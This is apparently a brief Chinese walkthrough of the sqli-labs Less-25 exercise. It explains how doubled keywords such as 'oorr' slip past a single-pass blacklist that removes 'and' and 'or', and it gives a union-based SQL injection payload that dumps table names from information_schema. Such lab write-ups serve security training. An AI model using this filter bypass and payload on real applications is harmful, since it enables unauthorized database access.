Less-25:
核心语句:
各种回显也均有。
通过blacklist,我们可以发现,本题屏蔽了and和or。
preg_replace函数中正则表达式后面的i是一个修饰符,代表正则匹配时不区分大小写。
我们也发现,该函数未进行重复替换。所以,我们可以用 oorr 代替语句里含 or 的部分; 用anandd aandnd代替 语句里含 and 的部分。 剩下操作同Less-1相同。
一个payload:?id=-1‘ union select 1,2,group_concat(table_name) from infoorrmation_schema.tables where table_schema=database() --+